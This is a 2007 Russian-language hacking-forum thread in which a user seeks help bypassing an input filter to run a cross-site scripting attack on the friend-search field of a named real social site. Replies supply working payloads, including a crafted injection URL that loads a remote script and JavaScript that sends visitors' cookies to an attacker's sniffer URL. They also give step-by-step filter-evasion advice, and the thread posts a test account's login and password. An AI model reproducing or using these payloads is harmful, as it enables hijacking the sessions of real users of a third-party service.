xss шифровка, обойти фильтр

Discussion in 'Песочница' started by offiks, 9 Dec 2007.

  1. offiks

    offiks New Member

    Joined:
    16 Jan 2007
    Messages:
    15
    Likes Received:
    2
    Reputations:
    0
    помогите вставить скрипт
    --><script>document.write(String.fromCharCode(<script>document.write("<img src=http://127.0.0.1/skript.php?kuki_one="+escape(document.cookie)+">");</script>));</script><!--
    и обойти фильтр :(
    Я ломал голову, да нету у меня особых навыков навыков, но хотелось бы сделать, помогите пожалуйста перекодировать чтоб сайт принял мою наживу
     
    1 person likes this.
  2. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    А фильтр на что ругаеться?
     
  3. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
  4. Dumkopff

    Dumkopff Elder - Старейшина

    Joined:
    5 Apr 2006
    Messages:
    60
    Likes Received:
    25
    Reputations:
    0
    http://old.antichat.ru/crackchat/HTML/
    кури.
     
  5. offiks

    offiks New Member

    Joined:
    16 Jan 2007
    Messages:
    15
    Likes Received:
    2
    Reputations:
    0
    я честно не могу разобратся в чём дело но ко мне доходит только: &quot; escape(document.cookie) &quot;

    по моему он не обробатывает плюсы, но когда я заменил плюсы на %2B он всё равно это же и присылает.

    P.S. большое спасибо за отзывчевость
     
  6. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    если ты не в курсе инет кряк как раз и делает это, есть такая строка как стринг =\ хех
     
  7. offiks

    offiks New Member

    Joined:
    16 Jan 2007
    Messages:
    15
    Likes Received:
    2
    Reputations:
    0
    я всё равно могу и декодировать и тут http://ha.ckers.org/xss.html#XSScalc , там всё же есть? не так ли? =[

    эту уязвимость я пытаюсь осуществить на сайте one.lv (в поле слева - найти друга (http://c7.one.lv/navigate.do?st.id=community.ownfriends.page&st.friends.fl.search=тут)

    помогите подходяще закодировать :( пробовал кодировать весь урл, всё равно не работает...

    Пожалуйста :( для меня это вопрос сложный, уже 2 день парюсь
     
  8. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    пля. там нужна регистрация... При реге надо воодить телефон =\ Я так понял туда пасс отправляеться =\
     
  9. offiks

    offiks New Member

    Joined:
    16 Jan 2007
    Messages:
    15
    Likes Received:
    2
    Reputations:
    0
    ой забыл, я хотел написать и подготовленый акаунт, извеняюсь
    Login: offx
    password: antichat

    кстате, когда я ему впариваю %22%2B%22 он их декодирует не в: "+" (как должно быть) а в: &quot; &quot;
     
    #9 offiks, 9 Dec 2007
    Last edited: 9 Dec 2007
  10. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    http://c7.one.lv/navigate.do?st.id=community.ownfriends.page&st.friends.fl.search=%22%3E;%3Cscript%20src=http://lamer-power.jino-net.ru/hek%3E%20%3C/script%3E
     
  11. offiks

    offiks New Member

    Joined:
    16 Jan 2007
    Messages:
    15
    Likes Received:
    2
    Reputations:
    0
    да, это я смог, но извини, я не понимаю как из этого извлечь выгоду... мне бы к ссылке приплюсовать чтобы отпровлялись кукисы, допустим как тут: <img src=http://127.0.0.1/skript.php?kuki_one="+escape(document.cookie)+">
     
  12. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    <script>img = new Image(); img.src = "Yoursniffer?"+document.cookie;</script>
     
  13. offiks

    offiks New Member

    Joined:
    16 Jan 2007
    Messages:
    15
    Likes Received:
    2
    Reputations:
    0
    ну вот тут и проблема, у меня не получается... =\ он мои ковычки и плюсики не принимает :(
     
  14. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    Юзай src =)
    Создаешь файл, например, "hek"
    Открываешь текстовым редактором и пишешь туда сл. текст:
    Code:
    var img = new Image(); 
    img.src = "http://127.0.0.1/skript.php?kuki_one="+document.cookie;
    
    Теперь заливаешь его на сайт...
    Теперь твоя XSS должна выгледить так:
    http://c7.one.lv/navigate.do?st.id=community.ownfriends.page&st.friends.fl.search=1;"><script src=http://Yoursite/hek>&nbsp;</script>

    И нету никаких ковычек =\
     
    2 people like this.
Loading...